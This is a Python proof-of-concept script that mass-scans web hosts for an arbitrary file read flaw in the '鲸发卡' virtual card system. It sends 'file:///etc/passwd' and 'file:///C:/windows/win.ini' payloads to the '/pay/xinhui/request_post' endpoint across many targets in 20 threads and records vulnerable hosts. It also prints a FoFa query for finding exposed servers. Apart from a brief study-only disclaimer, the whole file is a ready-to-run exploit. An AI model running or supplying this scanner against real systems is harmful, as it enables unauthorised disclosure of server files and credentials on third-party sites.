#!/usr/bin/env python3
import requests
from termcolor import colored
from tqdm import tqdm
from concurrent.futures import ThreadPoolExecutor, as_completed ,CancelledError
import os
import signal
import sys
# Startup banner. The first line is a notice (in Chinese) that the program is
# for study and exchange only and that unauthorised penetration testing is
# illegal; the rest is an ASCII-art logo and the author's URL.
# NOTE: this is not a raw string, so the backslashes in the art are processed
# as escape sequences (a backslash at the end of a row joins it to the next).
print('''
本程序仅用于交流学习使用,任何未经授权的渗透测试都是违法行为
/| __ __ ___ .....
|| | |/ .'
. _ _ .-'' '.
|| | .-. .-. ' /\ \ /// .-''"'-. . || __ __ | | | | | |
\ //\ /// /\ \
||/' '. .:--.'. | | | | | | _ `// '/ | |
|:/ '. '/ | \ || | | | | | | ' / |\| |/ \ .-------------' || | |
" __ | || | | | | |.' | .' | ' \ '-.___...---.
||\ / ' .'.''| ||| || ||/ | / | . .' |/\'..' / / / | |_ |
'. | ''-...... -' '
'-' \ \._,\ '/ ' .'| '/
--' "
-' `--' https://github.com/bamuwe
''')
# Prints the name of the issue being checked (in Chinese): an arbitrary file
# read vulnerability in the "鲸发卡" virtual card system.
print("漏洞名称:鲸发卡系统虚拟卡系统任意文件读取漏洞\n")
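# Make sure the input list and the results file exist before anything opens them.
for filename in ['urls.txt', 'result.txt']:
    if not os.path.exists(filename):
        # Opening in 'w' mode creates an empty file; nothing is written to it.
        with open(filename, 'w'):
            pass
        print(f"[*] Created successfully {filename}")
# Double-quoted so the single quotes around the example URL do not end the literal.
print("[!] Usage : echo 'http://example.com' > urls.txt && python3 poc.py")
print('[!] FoFa = "/static/theme/maowang51/css/style.css" && status_code="200" && country="CN"')
print()
# urls.txt always exists by this point (it is created above when missing), so
# an existence test can never fire. Check for content instead, matching the
# message that is printed.
if os.path.getsize('urls.txt') == 0:
    print('urls.txt is empty')
    sys.exit(0)
# Shutdown flag: set by the SIGINT handler and polled by main().
should_stop = False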
def signal_handler(sig, frame):
    """Handle SIGINT: raise the shutdown flag, notify the user, exit with status 0.

    ``sig`` and ``frame`` are the standard signal-handler arguments; neither
    is used here.
    """
    global should_stop
    should_stop = True
    print("\nInterrupt signal received and trying to stop the program...")
    # Equivalent to sys.exit(0): unwinds the main thread via SystemExit.
    raise SystemExit(0)
# Install signal_handler as the process-wide handler for SIGINT (Ctrl-C).
signal.signal(signal.SIGINT, signal_handler)
# Worker function that handles a single target URL
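def process_target(target):
    """Request one probe URL and report whether the response leaks file content.

    Args:
        target: Full probe URL (base URL plus the file-read query built in
            main()).

    Returns:
        ``target`` when the response is HTTP 200 and its body contains a
        marker of the requested file; otherwise ``None``, including on any
        ``requests`` error.
    """
    try:
        # Bound the wait: without a timeout a stalled server pins a worker
        # thread indefinitely and the run never finishes.
        response = requests.get(target, timeout=10)
    except requests.RequestException:
        # Unreachable or misbehaving hosts count as "not confirmed".
        return None
    if response.status_code != 200:
        return None
    body = response.text
    # The bare substrings 'root' and 'for' occur on almost any web page, so
    # matching them flags nearly every host that answers 200. Require markers
    # that are specific to the two files being requested instead.
    leaked_passwd = 'root:' in body and ':0:0:' in body
    leaked_win_ini = 'for 16-bit app support' in body
    return target if (leaked_passwd or leaked_win_ini) else None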
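def main():
    """Check every base URL in urls.txt and record the ones that respond as vulnerable.

    Reads base URLs from ``urls.txt``, builds one Linux-path and one
    Windows-path probe per URL, runs ``process_target`` on each in a
    20-worker thread pool, prints confirmed hits and appends them to
    ``result.txt``. ``SuccessCount`` is kept as a module-level global, as in
    the original.
    """
    global SuccessCount
    SuccessCount = 1
    with open('urls.txt') as fi:
        # Read the file once. A file object can only be iterated a single
        # time, so building the second list from `fi` always produced an empty
        # list: Windows-hosted instances were never checked and were silently
        # reported as clean. Blank lines are skipped.
        bases = [line.strip() for line in fi if line.strip()]
    targets = [base + '/pay/xinhui/request_post?url=file:///etc/passwd&post_data[1]=aaa' for base in bases]
    targets_windows = [base + '/pay/xinhui/request_post?url=file:///C:/windows/win.ini&post_data[1]=aaa' for base in bases]
    all_targets = targets + targets_windows
    pbar = tqdm(total=len(all_targets), desc='process')
    try:
        with ThreadPoolExecutor(max_workers=20) as executor:
            futures = []
            for target in all_targets:
                future = executor.submit(process_target, target)
                future.add_done_callback(lambda p: pbar.update())
                futures.append(future)
            try:
                for future in as_completed(futures):
                    if should_stop:
                        break
                    result = future.result()
                    if result:
                        pbar.write(colored(f"{SuccessCount}. {result} Vulnerable", 'green'))
                        with open('result.txt', 'a') as f:
                            f.write(result + '\n')
                        SuccessCount += 1
            finally:
                # as_completed only yields futures that have already finished,
                # so cancelling those (as the old loop did) is a no-op. Cancel
                # everything still queued instead, so that leaving the pool on
                # an interrupt does not wait for work that has not started.
                for pending in futures:
                    pending.cancel()
    finally:
        # Always release the progress bar, including on interrupt or error.
        pbar.close()
    print(colored(f"All targets have been processed {SuccessCount-1} vulnerable targets found", 'cyan'))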
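# Run the scan only when executed as a script. The bare `name` / 'main' form
# raises NameError at import time; the dunder names are what Python defines.
if __name__ == '__main__':
    main()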